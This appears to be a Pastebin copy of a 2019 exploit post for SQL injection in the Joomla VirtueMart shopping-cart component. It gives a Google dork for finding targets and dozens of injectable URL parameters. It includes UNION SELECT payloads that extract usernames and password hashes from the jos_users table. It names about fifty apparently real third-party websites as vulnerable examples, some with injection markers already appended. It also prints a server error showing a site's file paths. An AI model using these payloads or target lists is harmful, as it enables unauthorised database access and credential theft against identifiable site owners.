Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla VirtueMart 3.4.1 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : virtuemart.net
- # Software Download Link : virtuemart.net/downloads
- # Software Information Link : extensions.joomla.org/extension/virtuemart/
- # Software Affected Version : 3.4.1 and other previous versions.
- compatible with Joomla! 3.8.x and previous versions.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_virtuemart''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Old Similar CVE Numbers [ Version and Parameters are different ] :
- CVE-2016-10379 - CVE-2009-4430 - CVE-2007-3247 - CVE-2006-6945
- cvedetails.com/cve/CVE-2016-10379/
- cvedetails.com/cve/CVE-2009-4430/
- cvedetails.com/cve/CVE-2007-3247/
- cvedetails.com/cve/CVE-2006-6945/
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- VirtueMart is a highly configurable and customizable multi-language shopping
- cart solution for Joomla 3.8 with a large number of additional extensions.
- ####################################################################
- # Impact :
- ***********
- Joomla VirtueMart 3.4.1 and other previous versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser and via a web client.
- CVE-2016-10379 => CVSS Score 6.5
- *******************
- The VirtueMart com_virtuemart component 3.0.14 for Joomla! allows SQL injection by remote
- authenticated administrators via the virtuemart_paymentmethod_id or virtuemart_shipmentmethod_id
- parameter to administrator/index.php.
- CVE-2009-4430 => CVSS Score 7.5
- *****************
- SQL injection vulnerability in index.php in VirtueMart 1.0 allows remote attackers to
- execute arbitrary SQL commands via the product_id parameter in a
- shop.product_details shop.flypage action.
- CVE-2007-3247 => CVSS Score 6.8
- ******************
- SQL injection vulnerability in VirtueMart before 1.0.11 allows remote attackers to
- execute arbitrary SQL commands via unspecified parameters, possibly related
- to improper input validation of the PATH_INFO (PHP_SELF) by virtuemart_parser.php.
- CVE-2006-6945 => CVSS Score 7.5
- *******************
- SQL injection vulnerability in Virtuemart 1.0.7 allows remote attackers to
- execute arbitrary SQL commands via unspecified vectors, probably related
- to (1) Itemid, (2) product_id, and category_id parameters as handled in virtuemart_parser.php.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_virtuemart&Itemid=[SQL Injection]
- /index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SQL Injection]
- /index.php?option=com_virtuemart&view=category&virtuemart_category_id=[SQL Injection]&lang=en
- /index.php?option=com_virtuemart&view=category&virtuemart_category_id=[SQL Injection]
- /index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SQL Injection]
- /index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=[SQL Injection]
- /index.php?option=com_virtuemart&view=virtuemart&productsublayout=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?page=shop.browse&category_id=[ID-NUMBER]&vmcchk=[ID-NUMBER]&option=com_virtuemart&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.feed&category_id=[SQL Injection]
- index.php?option=com_virtuemart&view=category&virtuemart_category_id=[ID-NUMBER]&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.product_details&flypage=flypage.tpl&product_id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=[ID-NUMBER]&virtuemart_category_id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&Itemid=[ID-NUMBER]&vmcchk=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&view=category&virtuemart_category_id=[ID-NUMBER]&limit=[SQL Injection]&orderby=mf_name&dir=DESC
- /index.php?option=com_virtuemart&view=category&virtuemart_category_id=[ID-NUMBER]&Itemid=[ID-NUMBER]&limit=[SQL Injection]&orderby=mf_name
- /index.php?option=com_virtuemart&category_id=[ID-NUMBER]&page=shop.browse&Itemid=[ID-NUMBER]&limitstart=[ID-NUMBER]&limit=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.product_details&flypage=flypage.tpl&product_id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&category_id=[ID-NUMBER]&page=shop.browse&Itemid=[ID-NUMBER]&limitstart=[ID-NUMBER]&limit=[SQL Injection]
- /index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=[ID-NUMBER]&tmpl=component&print=[SQL Injection]
- /index.php?option=com_virtuemart&tmpl=component&flexiblelayout=quicklook&view=productdetails&virtuemart_product_id=[ID-NUMBER]&virtuemart_category_id=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&keyword=sample&manufacturer_id=[ID-NUMBER]&Itemid=[ID-NUMBER]&orderby=product_sku&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_virtuemart&view=productdetails&task=askquestion&virtuemart_product_id=[ID-NUMBER]&virtuemart_category_id=[SQL Injection]&tmpl=component
- /index.php?option=com_virtuemart&view=category&Itemid=[ID-NUMBER]&lang=vi&language=vi-VN&order=DESC&orderby=p.product_sku&limit=[SQL Injection]
- /index.php?DescOrderBy=DESC&Itemid=[ID-NUMBER]&option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&manufacturer_id=[ID-NUMBER]&keyword=&keyword1=&keyword2=[SQL Injection]
- /index.php?page=shop.product_details&flypage=shop.flypage&product_id=[ID-NUMBER]&category_id=[ID-NUMBER]&manufacturer_id=[ID-NUMBER]&option=com_virtuemart&Itemid=[ID-NUMBER]&vmcchk=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&keyword=&manufacturer_id=[ID-NUMBER]&Itemid=[ID-NUMBER]&orderby=%7Bvm%7D_product.product_name&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_virtuemart&view=category&Itemid=[SQL Injection]&order=DESC&orderby=mf_name&virtuemart_manufacturer_id=[SQL Injection]&limit=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&keyword=[ID-NUMBER]&manufacturer_id=[ID-NUMBER]&Itemid=[ID-NUMBER]&orderby=product_cdate&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&keyword=[ID-NUMBER]&manufacturer_id=[ID-NUMBER]&Itemid=[ID-NUMBER]&orderby=product_cdate&limit=[ID-NUMBER]&limitstart=[SQL Injection]&lang=nl
- /index.php?option=com_virtuemart&view=category&virtuemart_category_id=[ID-NUMBER]&Itemid=&orderby=category_name&limit=[ID-NUMBER]&view=category&virtuemart_category_id=[ID-NUMBER]&Itemid=&limit=[SQL Injection]&order=DESC&orderby=category_name
- /index.php?orderby=product_price&DescOrderBy=ASC&DescOrderBy=ASC&Itemid=[ID-NUMBER]&option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&manufacturer_id=[ID-NUMBER]&keyword=&keyword1=&keyword2=&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?orderby=product_name&DescOrderBy=ASC&Itemid=[ID-NUMBER]&option=com_virtuemart&page=shop.browse&category_id=[ID-NUMBER]&manufacturer_id=[ID-NUMBER]&keyword=&keyword1=&keyword2=&limit=[ID-NUMBER]&limitstart=[ID-NUMBER]&vmcchk=[ID-NUMBER]&Itemid=[SQL Injection]
- /administrator/index.php?page=order.order_status_form&limitstart=[ID-NUMBER]&keyword=&order_status_id=[SQL Injection]&option=com_virtuemart
- # Example SQL Injection Payload :
- ********************************
- 200+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users-
- 200+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)KingSkrupellos,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1
- +limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1-
- /administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] airpec.eu/joomla/index.php?option=com_virtuemart&page=shop.browse&category_id=0&keyword=0&manufacturer_id=0&Itemid=27&orderby=product_cdate&limit=50&limitstart=85&lang=nl
- [+] wannemacherjewelers.com/index.php?option=com_virtuemart&view=category&virtuemart_category_id=296%27
- [+] kingwoodlaser.com/cms2/index.php?option=com_virtuemart&view=category&virtuemart_category_id=11&Itemid=&orderby=category_name&limit=6&view=category&virtuemart_category_id=11&Itemid=&limit=6&order=DESC&orderby=category_name
- [+] prestigetx.com/index.php?option=com_virtuemart&view=category&Itemid=274&order=DESC&orderby=mf_name&virtuemart_manufacturer_id=1&limit=6%27
- [+] symmalaga.com/index.php?option=com_virtuemart&view=category&virtuemart_category_id=15&limit=5&orderby=mf_name&dir=DESC
- [+] lajabonetta.com/index.php?option=com_virtuemart&view=virtuemart&productsublayout=0&Itemid=486%27
- [+] sumdayvacations.com/index.php?page=shop.browse&category_id=263&vmcchk=1&option=com_virtuemart&Itemid=55%27
- [+] kugumagazalari.com/index.php?option=com_virtuemart&Itemid=118&vmcchk=1&Itemid=118%27
- [+] rita.udistrital.edu.co/comiteingenieria/index.php?option=com_virtuemart&view=category&virtuemart_category_id=1&Itemid=174&limit=150&orderby=mf_name
- [+] puertomaderomarket.com/index.php?option=com_virtuemart&Itemid=2&vmcchk=1&Itemid=2%27
- [+] wifiaustral.net/index.php?page=shop.product_details&flypage=shop.flypage&product_id=30&category_id=9&manufacturer_id=0&option=com_virtuemart&Itemid=42&vmcchk=1&Itemid=42
- [+] outarte.com/index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=9&virtuemart_category_id=5&Itemid=111%27
- [+] clubmitsubishi.ee/index.php?option=com_virtuemart&page=shop.browse&category_id=2&Itemid=64%27
- [+] dianomesachaias.gr/index.php?option=com_virtuemart&category_id=21&page=shop.browse&Itemid=2&limitstart=0&limit=20%27
- [+] pinoylancers.com/testsorella/index.php?option=com_virtuemart&page=shop.product_details&flypage=flypage.tpl&product_id=4&Itemid=28%27
- [+] zenthar.com/sovietpropaganda/index.php?option=com_virtuemart&Itemid=85&vmcchk=1&Itemid=85%27
- [+] promotionracing.com/promotion/index.php?option=com_virtuemart&page=shop.browse&category_id=9&keyword=&manufacturer_id=0&Itemid=28&orderby=%7Bvm%7D_product.product_name&limit=25&limitstart=35%27
- [+] bscmarzahn.com/alt/index.php?option=com_virtuemart&Itemid=475%27
- [+] taxi-heiss.de/horsedream/index.php?option=com_virtuemart&page=shop.browse&category_id=10&Itemid=63&vmcchk=1&Itemid=63%27
- [+] hurt.polsirhurt.pl/index.php?option=com_virtuemart&page=shop.browse&category_id=35&Itemid=1&vmcchk=1&Itemid=1%27
- [+] pimadesign.it/index.php?page=shop.product_details&category_id=4&flypage=shop.flypage&product_id=66&option=com_virtuemart&Itemid=1%27
- [+] schusti.at/fetisch4you/index.php?option=com_virtuemart&view=category&virtuemart_category_id=5&limitstart=20&Itemid=&limit=10%27
- [+] santafemetal.com/index.php?DescOrderBy=DESC&Itemid=28&option=com_virtuemart&page=shop.browse&category_id=1&manufacturer_id=0&keyword=&keyword1=&keyword2=1%27
- [+] crystalpalace.yakandyeti.co.uk/index.php?option=com_virtuemart&page=shop.browse&category_id=31&Itemid=155%27
- [+] makofire.com.au/index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=203&tmpl=component&print=1%27
- [+] truongsonfurniture.com/index.php?option=com_virtuemart&view=category&Itemid=178&lang=vi&language=vi-VN&order=DESC&orderby=p.product_sku&limit=3%27
- [+] unitedmerchants.co.za/index.php?option=com_virtuemart&view=productdetails&task=askquestion&virtuemart_product_id=626&virtuemart_category_id=217&tmpl=component
- [+] dident.com.pe/catalogo/index.php?option=com_virtuemart&page=shop.product_details&flypage=flypage.tpl&product_id=19&Itemid=33%27
- [+] schusti.at/fetisch4you/index.php?option=com_virtuemart&view=category&virtuemart_category_id=5&limit=4&limitstart=20%27
- [+] pimadesign.it/index.php?page=shop.product_details&category_id=7&flypage=shop.flypage&product_id=93&option=com_virtuemart&Itemid=1%27
- [+] duratec.de/info/index.php?option=com_virtuemart&page=shop.browse&category_id=0&keyword=sample&manufacturer_id=0&Itemid=33&orderby=product_sku&limit=15&limitstart=195%27
- [+] acnetit.com/site/uomoplus/index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=103&virtuemart_category_id=18%27
- [+] danicarsrl.it/_oldsite/index.php?option=com_virtuemart&tmpl=component&flexiblelayout=quicklook&view=productdetails&virtuemart_product_id=3286&virtuemart_category_id=6%27
- [+] infotek.eu/joomlavm/index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=104&virtuemart_category_id=25%27
- [+] oinos.be/oinos/index.php?orderby=product_price&DescOrderBy=ASC&DescOrderBy=ASC&Itemid=53&option=com_virtuemart&page=shop.browse&category_id=0&manufacturer_id=0&keyword=&keyword1=&keyword2=&limit=15&limitstart=70%27
- [+] yolandagonzalez.com/index.php?orderby=product_name&DescOrderBy=ASC&Itemid=37&option=com_virtuemart&page=shop.browse&category_id=24&manufacturer_id=0&keyword=&keyword1=&keyword2=&limit=5&limitstart=20&vmcchk=1&Itemid=37%27
- [+] dmproject.net/index.php?option=com_virtuemart&view=category&virtuemart_category_id=2&lang=en
- [+] helm4u.com/092015/index.php?option=com_virtuemart&view=category&virtuemart_category_id=7%27
- [+] scorecampus.com/scorecampus/index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=45&Itemid=233%27
- [+] giampaolidolciaria.eu/en/index.php?option=com_virtuemart&category_id=5&page=shop.browse&Itemid=4&limitstart=0&limit=50%27
- [+] bulato.it/serramenti/index.php?option=com_virtuemart&page=shop.feed&category_id=8%27
- [+] topcopy.co.rs/index.php?page=shop.browse&category_id=7&option=com_virtuemart&Itemid=46%27
- [+] smartonecity.com/pt/index.php?option=com_virtuemart&page=shop.browse&category_id=10&Itemid=67%27
- [+] cosulca.com/index.php?option=com_virtuemart&page=shop.browse&category_id=44&Itemid=7&vmcchk=1&Itemid=11%27
- [+] inverluz.com/index.php?option=com_virtuemart&view=category&virtuemart_category_id=14%27
- [+] abcdelvitral.com/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=421&category_id=68&option=com_virtuemart&Itemid=58%27
- [+] unitedmerchants.co.za/index.php?option=com_virtuemart&view=category&virtuemart_category_id=74%27
- [+] pastorek.elektrikarpraha.cz/index.php?page=shop.browse&category_id=6&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1%27
- [+] opony-bialystok.pl/index.php?page=shop.cart&option=com_virtuemart&Itemid=2&vmcchk=1&Itemid=2%27
- [+] hurt.polsirhurt.pl/index.php?page=shop.product_details&product_id=249&flypage=flypage.tpl&pop=0&option=com_virtuemart&Itemid=1%27
- [+] chemcoplast.com/index.php?option=com_virtuemart&Itemid=53%27
- [+] panarotto.it/index.php?option=com_virtuemart&view=category&virtuemart_category_id=5%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Cannot modify header information - headers already sent by
- (output started at /home/airpec/www/joomla/components/com_sef/cache
- /shCacheContent.php:6747) in /home/airpec/www/joomla/mambots
- /system/jfdatabase.systembot.php on line 195
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement